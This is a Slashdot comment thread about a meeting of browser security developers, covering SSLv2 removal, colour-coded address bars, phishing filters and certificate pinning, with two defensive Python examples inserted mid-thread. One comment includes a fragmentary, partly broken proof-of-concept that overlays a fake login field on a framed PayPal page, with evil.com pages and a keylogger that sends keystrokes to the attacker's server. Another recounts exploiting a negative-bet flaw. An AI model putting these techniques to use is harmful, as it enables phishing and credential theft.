Web Browser Developers Work Together on Security
JRiddell writes "Security developers for the four major browsers recently met together to discuss Web security. The meeting, hosted by Konqueror's George Staikos, looked at future plans to combat the security risks posed by phishing, ageing encryption ciphers and inconsistent SSL Certificate practise. IE 7 is one of the first browsers to implement some of the ideas discussed such as colour coding location bars and an anti-phishing database." From the article: "The first topic and the easiest to agree upon is the weakening state of current crypto standards. With the availability of bot nets and massively distributed computing, current encryption standards are showing their age. Prompted by Opera, we are moving towards the removal of SSLv2 from our browsers. IE will disable SSLv2 in version 7 and it has been completely removed in the KDE 4 source tree already."
These improvements sound good. But can I make a further suggestion?
Like many people, I have a few sites that I want complete assurance about, such as my personal banking sites. I don't want to simply trust a third-party CA to vet them, even if it is capable of providing high-assurance. As well as concerns about the business model for that CA, it still will sign a very large number of web-site certificates. If any of those web sites were compromised or the CA was tricked into signing a certificate, it opens an opportunity for the browser to say "highly trusted" when it isn't - and may even be a different web site if DNS could be compromised. And I expect it would take a long time, if possible at all, to persuade all sites to get signed by one of the "blessed" CAs.
I much prefer the model used by the Petnames extension of Firefox (http://www.waterken.com/user/PetnameTool/), which allows me to register the server digital certificate thumbprint, and to give the site a nick-name ("My bank"). If the certificate changes in any way, I'll get warned and can do the appropriate checks. Effectively I'm managing my own white-list of a handful of sites, so don't need to trust someone else's whitelist of tens of thousands; or even worse a blacklist of far more.
This can co-exist with the proposals above; for example by allowing the user to store their trust relationship which then displays (say) a blue address bar. Other sites will go through the green / red / white display.
Please mod me only (+) Underrated or (-) Troll
I've seen several site operators let their sites sit with SSL warning boxes because they insist on using a self-issued SSL certificate instead of paying for a major brand name label.
Most of the time, this isn't exposed to customers, but employees of the organization are trained to ignore the "This certificate was not issued by a trusted authority," warnings, and I fear such people will take away that that box with all of its technobabble is one they should ignore at all times. That box is a last line of defense against an encrypted connection that isn't trustworthy... and I think this is a step forward to the point where browsers will refuse to give SSL encryption without SSL authentication succeeding.
Competition has raised the standards of what we expect out of a browser. Collaboration is a great idea especially if I can submit private information without being paranoid. I worry that one day the browser market will be monopolized again, and I will have to use something that is about as safe as letting a toddler play with a cheese grater.
Just remove forms! Voila!
Would someone mind explaining the removal/disabling of SSLv2? More importantly, what's slated to be used in place of it?
What if the entire Universe were a chrooted environment with everything symlinked from the host?
In case anyone's curious, here is a description of the problems with SSLv2, including some info about the newer v3 stuff.
Free Conference Call -- No Spam, High Quality
Stop coding in C/C++ when the product will be exposed to external, uncontrolled inputs. Java, .NET, Parrot... I don't really care what gets used, but it has been clear that despite the constant "C++ using the proper string libraries is as secure as virtual machines and interpreters" cries that those who actually wield the language to make products like browsers are still failing to secure against the most basic and common flaw: the buffer overflow. Browsing web pages is *not* the kind of thing that requires "bare to the metal" coding. Yes, such a browser might be vulnerable to attacks on the virtual machine itself... but a quick look at the browsers' security history versus virtual machine security histories makes it clear that is a tradeoff worth making.
Sig under construction since 1998.
Copied from here?
SteveM
so wonder what the tone was like. smarty pants contest?
or 'here we are caring and sharing and collaborating! let's standardize on a little lock icon!'
Is to not have the [a] web browser interfaced with kernel/operating system. A stand-alone application browser (a la K-Meleon, Firefox, etc.) will immediately stop the devs having to worry about other security overheads (reference IE that is built in (badly) to handle all sorts of stuff that it shouldn't even touch).
"IE 7 is one of the first browsers to implement some of the ideas discussed such as colour coding location bars"
I like how this person uses "one of the first" in a positive sense.
It's nice to see Microsoft participating in the event. I was surprised; I didn't think they sat round tables with open source developers. Does this happen in other areas of development?
Open Source Drum Kit, LPLC deve board - mjhdesigns.com
I see on the screenshots that IE7 is gonna use a yellow location bar to indicate a suspicious web site. Ironically, in Firefox, that same color indicates a secured site. I'm sure somebody will be fooled someday...
I hate all sigs, mine included.
...developers need to be aware of how to write secure server-side code. Joseph Hemler's book Network Security Tools has a chapter about finding security flaws with static analysis tools like PMD.
The Army reading list
Can we find a better name than phishing? Most people don't get it, and wave it off as just another overcomplicated word that people who think they are smart use. They will ignore an anti-phishing filter because they just don't know what it is.
We need a non-geek term for this, something that is clear and easily understandable. "Malicious Websites" or an "Identity Theft Filter" just not phishing.
I'm happy to see that we're looking at an important part of a free competitive market: voluntary cooperation for better competitive products.
The security enhancements we'll see that come out of these (and future) discussions will help all users yet also increase competitiveness in other areas. We didn't need a Congress or government body to force regulations, they're occurring out of customer need.
Note that government could create regulations but we all know that those regulations come too late and can never adapt to current and future ever-changing needs.
I read a great article today about the historical growth of the Net because of the lack of regulations and taxes.
Many users have significant problems when anything changes in their computer experience; my father for example. I tried moving him over to Firefox so that he could stay away from spyware et al, but he couldn't make the move because he couldn't navigate the user interface anymore. This man is no dullard either. He taught me to program when I was 8, has a PhD in (if I remember correctly) biology, pharmacology, or physics, teaches microbiology, and is an associate dean at a world-class university. For all of his smarts, he has had problems with computers ever since he was weaned off of DOS and onto Windows 3.1. After many years of training he's finally to the point where he can work successfully in an environment as long as nothing ever changes.
Skip ahead to Windows XP service pack 2. Automatic updates are now on. He's been trained to allow the updates to happen, but only after I get a phone call asking me if they're ok. Unfortunately, updating sometimes means that I have to spend an hour or so teaching how to burn cds, how to switch between home/work networks, how to play music, etc. at regular intervals. I rue Microsoft not for their lax security (well, not just for their lax security), but for their ever present desire to "upgrade" their interfaces to make them "easier."
At his work they upgrade computers relatively often. The day will come when he will have to call me each time he goes to a website with the "wrong" color.
><));>
I seem to remember a green or blue bar when an https connection worked, and red when there were errors validating the certificate.
Later versions made this less obvious, with the key in the status bar.
Hands in my pocket
In the very near future the single most important attack vector for webspoofing will be subversion of the local system. Once you get access to the local system, you can manipulate DNS and the certificate store as well, so no offline or online spoof check has a fighting chance of working reliably. For this to change, users would have to stop browsing with full privileges. IOW, it's good that browser developers keep working on improving security, but the bigger security improvements lie elsewhere.
Also, please don't confuse users by using different location bar coloring schemes. Firefox already uses yellow for SSL secured sites. If Microsoft makes yellow to mean "potential spoof", nothing good will come of it. IMHO having the browser give you "green lights" is a stupid idea. The best you can do is recognize when a security sensitive operation is taking place and alert the user to that fact. More than that will only provide a false sense of security. Use red when you know that a site is a spoof or encryption is insufficient, use yellow when a site uses sufficiently strong SSL.
Ideas such as colour coding location bars and an anti-phishing database.
Do they mean like in the Netcraft anti-phishing toolbar?
My Karma: ran over your Dogma
StrawberryFrog
OK, raise your hand if you think there's a clearly identifiable "four major web browsers." As in, when you hear the phrase "representatives of the 4 major web browsers" you know exactly which 4 are being talked about.
OK, now how many of you had Konqueror as one of the 4?
C'mon--I like Konqueror as much as the next user, but beyond IE and Firefox there are a large number of minor browsers out there. Mozilla, obviously, unless you lump that with Firefox as I do. Then probably Opera. And then, what, Safari? Konqueror is maybe 6th or 7th. So how "cross browser" is this?
I've always thought that a tiny padlock in the status bar is not enough visual indication for the average user, so it's about time someone comes up with something better. Microsoft has a great idea here, but I don't think a simple color change is good enough. There should be textual feedback. Now, if they were to use the status bar more effectively (such as "SSL Encrypted via Verisign") with color differentiation, they'd really be onto something. A simple color shift? I'd bet that the average Joe Sixpack will say "ooooh, purty" and be totally unaware that he's submitting his credit card to a Nigerian scammer.
Regarding removal of SSL: WHY? A self-issued certificate is perfectly good for corporate email sites and things like that. If the system is flawed, address the flaws, but don't throw out an entire legacy system which is still in widespread use. But then by that logic, that is also how Windows came to inherit all of the security flaws it has now, I suppose.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
I'd like to see visual cues for IRIs containing characters not from my locale; and for characters not from the locale of the displayed document. "Different codepoints, similar glyph" is going to become another vector for phishing, I think.
Nothing to see here. Move along.
Really, this is a blank comment.
OK, it isn't. But Slashdot ruined my joke by not letting me post one.
tasks(723) drafts(105) languages(484) examples(29106)
Mozilla - "What we REALLY need is for all browsers to comply to some sort of standard, so that users don't have the compatibility headaches they currently have" Microsoft - "Aww, come on, that would be too much effort! Can't we just fiddle with pretty colours?"
IE
Firefox/Mozilla
???
???
SSLv2 is disabled by default in Firefox.
:)
You don't need to have a major release of your browser in order to change just one setting.
I've seen a number of posts about encryption being the problem. It's not. Yes, it is possible to crack some older algorithms with distributed botnets, yes, self-signed certificates pose a problem, but no, these are not the real problems. The real problems facing users (by this I mean the problems causing financial damage to consumers and companies) come from attacking the user and his/her environment, not attacking the encryption. When was the last time you saw someone brute-forcing the decryption of a session, with the purpose of obtaining the user's information? This makes great stuff for movies where we're trying to crack into an Evil Foreign Government or an ultra-sophisticated criminal, but in real life this is not the threat.
The threat that browsers need to address is the fact that their *users* and their users' *environments* are being attacked. Phishing attacks don't target weak encryption protocols. Heck, most don't even bother setting up an SSL-enabled phishing site, because people don't look for encrypted sessions in general. Phishing attacks target the user by attempting to fool the person into believing that they are at the actual site. Ask yourself - would your mother know that chase-online-banking.com is not the real address for Chase's online system? (Phishing trends show that phishers are increasingly using name-based attacks, as opposed to an IP-based URL).
As for attacking the environment, keyloggers and malware in general are exploding in popularity. Again, this is not a problem with the encryption protocols used for securing sessions, rather it's the user's environment being attacked. One must remember that browsers don't run in a vacuum - they have a user and an environment. Using 256-bit AES encryption is great, nifty, and cool, but if my mother's computer has a keylogger installed and I decide to do some e-banking while visiting for the holidays, well then I've got a problem.
People need to re-evaluate security in the context of which these applications are run, and stop thinking that simply increasing keylength or swapping cipher algorithms will solve the problem. It won't. Our problem is that security isn't usable, it isn't intuitive, and until we make it so we will continue to have these problems.
I reckon it's a great idea to avoid phishing sites, maybe from a nerd's point of view it isn't so great, for the avg joe it looks like a winner.
... After IE 7 I don't want to hear another word about other software vendors flogging ideas from MS, it goes to show how much they all flog from each other ...
The only problem I have is the fact that the newer versions of IE will incorporate tabbed browsing and the MSN search tool which looks almost exactly like the Firefox search tool
I agree that "phishing" is arcane and not helpful to people who aren't already familiar with the term and concept. But I think "Identity Theft Filter" is a bit confusing. I feel like a lot of people don't understand what identity theft is. "Malicious Websites" is OK, but it doesn't really explain how the site is malicious. (Browser exploit? Hate speech? etc.) Maybe "Deceptively Disguised Website" would be a good starting point. From there applications could guide users to explanations of why and (in simple terms) how websites are disguised, and what can happen if you're foolish enough to trust one.
---GEC
I'm but the humble pupil, seeking to snatch the scratchbuilt pebble from the master's fully articulated hand
What are IE7, Konq, FF and other next gen web browsers doing to stop self-signed certs?
A screen full of technobabble isn't enough. A warning that the site is suspicious, as used for other dodgy sites, is better.
to Cross-Site-Scripting. Why should I try to spoof a site, if I can simply take the original website and capture or modify it on-demand?
c om"+" (many spaces).hehe-dnsismagic.evil.com');
// modify the website as you wish }
// yeah, that works cross-domain!
[p][a id="SPOOF" href="xttp://www.evil.com/evil.htm"][/a][/p]
[div][a href="xttps://login.paypal.com"]
[table][caption]
[a href="xttps://login.paypal.com"][label for="SPOOF"][u style="cursor: pointer; color: blue"]
xttps://login.paypal.com[/u][/label][/a]
[/caption][/table]
[/a][/div]
evil.htm:
[script]
window.open('evil2.htm','','xttps://login.paypal.
[/script]
evil2.htm:
[html]
[div style="position: absolute; left: 405px; top: 245px;"][input name="login" id="login" style="border: 0px none ; width: 145px; height: 18px; z-index: 12; font-size: x-small; font-family: Arial,Helvetica,sans-serif;" value="" type="text"][/div]
[div style="position: absolute; width: 155px; height: 28px; left: 7px; top: 122px; background-color: red; z-index: 11;" onclick="focus()" unselectable="on"][/div][!--position it right, baby!--]
[script]
var keylog='';
var login=document.getElemtentById('login');
document.onkeypress = function () {
k = window.event.keyCode;
keylog += String.fromCharCode(k);
login.value=keylog;
submitkeylogtomyserver(); }
[/script]
[frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*"]
[frame src="xttps://login.paypal.com" scrolling="auto"]
[/frameset]
Or, even simpler:
window.prototype.x=new function() {
window.open('evil3.htm','','');
waitsometime();
window.location='https://login.paypal.com';
evil3.htm:
waitsometime();
window.opener.x();
Anyway, it should be much simpler to simply install some malware through one of those unpatched remote code execution security holes.
As long as Microsoft leaves those, well I counted: 49 (!) still unpatched security holes wide open, the Phishing filter is pretty useless.
I typed "web browser firewall" at download.com and got this
- 8022_4-10461208.html?tag=lst-0-2
7 1435.html?tag=lst-0-4
http://www.download.com/SpyWall-Anti-Spyware/3000
seems like there is a firewall for web browser now.
and another one....
http://www.download.com/Sandboxie/3000-2366_4-103
I read a study recently that most phishing web sites don't live longer than a week...
A database of unimportant entries is not going to do any good.
I figure that Microsoft will have to keep a staff of around a dozen people day and night checking out each one of these flagged URLs as soon as the URLs come in, or otherwise it is not going to be very effective.
"We mustn't be caught by surprise by our own advancing technology" -- Aldous Huxley
In what culture does a yellow traffic light not mean caution?
http://www.yafla.com/dforbes/2005/11/22.html#a191
(I saw that on Digg, btw, but of course it quickly cycled off the page while the groupthink herds were busy pushing up every lame story about the FireFox religion)
A bad programmer can be equally incompetent in any language.
A few security holes I've found:
A system where you can gamble online credits, you bet n credits, and a number between 1 and 5 was generated, if you guessed the number, you would win 4 times your bet, otherwise you lose your bet, maximum winnings of 100 credits a day. I bet -1000000000 credits, so when I lost I gained 4000000000 credits. (which errored out and dumped me to a command prompt, from which I could read/edit the password file)
Sending an e-mail to an 'anonymous' mail service with an HTML document enclosed with an image linked to my own web server, gave me the IP address of the recipient.
A commercial web site that allowed me to enter a username of blah blah blah, which it would then display to other users of the site.
Aging - not ageing.
As in "The aging process must have been accelerated for the person who wrote the post..."
Please tell us what culture uses a yellow traffic light to mean something besides caution.
I tried to install Java on my computer. I gave up when I discovered that Sun won't let me install it directly. I have to make special effort to agree to their license. FreeBSD-ports cannot include it directly. I can deal with it, but it isn't worth the bother.
However things get worse when you are not a personal user. At work we are interested in an open-source project written in Java, but because of the license we cannot use it. (We want to ship it as part of an embedded system, the only way to install would be to have every customer download the JVM somehow) DOA because of this. (We tried gcj but were unable to get it to work - I wish that effort luck though)
Sun does not want Java to succeed. I'm all for helping them in that goal.
IE 4, IE 5, IE6, and IE 7? Maybe you mean the 1 major browsers, and 3 other guys who like to talk about how major they're gonna be in a couple years.
You do not understand why we come to /.
Hint: It isn't the stories as such.
The claim is that IE7 is "one of the first" browsers to have a color-coded location bar. Maybe "one of the last" is more appropriate?
How does this colour coding help people who are colour blind?
Just an idea, but if there is a link like www.ebay.com, the browser should show a warning that you're using a deceptive URL. I'm sure implementing a good way to handle that is another story though...
Scott Swezey
Nope, it would not. This is by design. Server certificates expire, so they have to be changed every year, or every second year. This is supposed to take place without any warning displayed to the user. The browser does not remember the server certificate, it just checks that it is signed by one of the CAs on its installed list of CAs.
You may be thinking of the way ssh handles "trusted hosts". Ssh asks you if you will trust a host the first time you connect to it, and stores the host's key in the "trusted hosts" list. If that key changes, ssh will give a really stern warning. SSL does not work that way.
SSL is based on the "Trusted Third Party". The CAs are the trusted third parties. The browser vendors decide which CAs to add to the list by default. If you don't trust them, you will have to remove them manually, if the browser or operating system allows that (on some embedded devices it's take it or leave it).
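The ssh-style "remember the key" model contrasted above with CA trust, and proposed earlier in the thread as a Petname-style personal whitelist, sketched as an added example (not code from the Petname tool or any browser). The store, the verdict names and the certificate bytes are constructed for illustration; a real implementation would hash the DER certificate received in the TLS handshake.

```python
import hashlib
from enum import Enum


class Verdict(Enum):
    PINNED_MATCH = "pinned-match"      # user-registered site, same certificate
    PINNED_CHANGED = "pinned-changed"  # user-registered site, different certificate
    UNPINNED = "unpinned"              # not registered: ordinary CA validation applies


def thumbprint(cert_der: bytes) -> str:
    """SHA-256 thumbprint of a DER-encoded certificate, lowercase hex."""
    return hashlib.sha256(cert_der).hexdigest()


class PetnameStore:
    """Hypothetical in-memory whitelist: host -> (petname, thumbprint)."""

    def __init__(self):
        self.pins = {}

    def register(self, host: str, petname: str, cert_der: bytes) -> None:
        self.pins[host.lower()] = (petname, thumbprint(cert_der))

    def check(self, host: str, cert_der: bytes):
        entry = self.pins.get(host.lower())
        if entry is None:
            return Verdict.UNPINNED, None
        petname, pinned = entry
        if pinned == thumbprint(cert_der):
            return Verdict.PINNED_MATCH, petname
        return Verdict.PINNED_CHANGED, petname

    def accept_change(self, host: str, cert_der: bytes) -> None:
        """Re-pin after the user has verified a renewal out of band."""
        petname, _ = self.pins[host.lower()]  # KeyError if never registered
        self.pins[host.lower()] = (petname, thumbprint(cert_der))


def address_bar(store: PetnameStore, host: str, cert_der: bytes, ca_valid: bool) -> str:
    """Combine the personal whitelist with the CA result."""
    verdict, petname = store.check(host, cert_der)
    if verdict is Verdict.PINNED_MATCH:
        return f"blue: {petname}"
    if verdict is Verdict.PINNED_CHANGED:
        # A CA-valid certificate does not clear this: a mis-issued or
        # swapped certificate would also pass CA validation.
        return f"warn: certificate for '{petname}' changed"
    return "ca-valid" if ca_valid else "ca-invalid"


# Constructed stand-ins for DER certificates (not real certificates).
CERT_OLD = b"constructed-cert-bytes-2005"
CERT_NEW = b"constructed-cert-bytes-2006"
```

The yearly renewal mentioned above is the cost of this model: every legitimate certificate change produces the warning until the user calls `accept_change`.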
FireFox : changes color for secure connections, etc... (your e-Banking site is yellow, because of https & validate certificate)
There's also a proposition to change color when using a mixed character bank (warning for cyrillic/latin homographs, etc...)
etc...
IE7 : changes color for URLs from known spoofers (www.paypaI.com is red because it's in a phisher-black-list. But a new phisher won't be red until added to black-list.).
It's 2 different coloring methods, it's heuristic vs. "list-of-known-evil"
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
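The heuristic side of this comparison, and the "different codepoints, similar glyph" cue asked for earlier in the thread, as an added example (not taken from any browser): a mixed-script check per hostname label plus a lookalike check against sites the user already knows. The confusables table is a small constructed sample, and reading the script from the Unicode character name is a simplification.

```python
import unicodedata

# Script is inferred from the character-name prefix (simplification:
# Python's unicodedata does not expose the Unicode Script property).
SCRIPT_PREFIXES = ("LATIN", "CYRILLIC", "GREEK")

# Constructed sample of confusable characters mapped to a Latin skeleton.
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",  # Cyrillic а е о р
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",  # Cyrillic с у х і
    "I": "l", "1": "l", "0": "o",                                # ASCII lookalikes
})


def decode_label(label: str) -> str:
    """Turn an xn-- (punycode) label into the Unicode text a user would see."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label
    return label


def scripts_in(label: str) -> set:
    """Set of scripts used by the letters of one hostname label."""
    found = set()
    for ch in label:
        if ch.isdigit() or ch == "-":
            continue
        name = unicodedata.name(ch, "")
        for prefix in SCRIPT_PREFIXES:
            if name.startswith(prefix):
                found.add(prefix.title())
                break
        else:
            found.add("Other")
    return found


def skeleton(host: str) -> str:
    """Collapse confusable characters so lookalike names compare equal."""
    return host.translate(CONFUSABLES).lower()


def classify(host: str, known_hosts) -> str:
    """Return 'mixed-script', 'known', 'lookalike' or 'no-finding'."""
    labels = [decode_label(part) for part in host.split(".")]
    display = ".".join(labels)
    if any(len(scripts_in(label)) > 1 for label in labels):
        return "mixed-script"
    if any(display.lower() == known.lower() for known in known_hosts):
        return "known"
    if any(skeleton(display) == skeleton(known) for known in known_hosts):
        return "lookalike"
    return "no-finding"
```

The name www.paypaI.com from the comment uses only Latin letters, so the mixed-script check passes it; only the comparison against known sites flags it, and neither check says anything about a deceptive name that resembles no site on the user's list.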
TrustBar is a FireFox extension that already (and for a while already) implements your proposal... Namely, it supports both `petnaming` of a site, i.e. to assign a name (or, with TrustBar, a logo) to a site, and also display of the name of the organization and of the CA, like IE 7 (and future browsers). It is the result of secure usability study by Ahmad Jbara and myself, and has some other mechanisms, including random `exercise training attacks` to help users stay trained to watch for the name/logo of the site. (I must admit that this mechanism is now set for too frequent `exercise attacks`, we will improve this in our next release very soon, but you can also reduce or eliminate this using the user interface of course).
There are some differences in the way TrustBar and Petname extensions handle the `petnaming` aspect; of course, I think what we do is more correct, and Tyler (Petname developer) disagrees... we use the anti-fraud forum to discuss such issues, join us if interested.
Best, Amir Herzberg
Prof. Amir Herzberg Dept. of Computer Science, Bar Ilan Univ. http://AmirHerzberg.com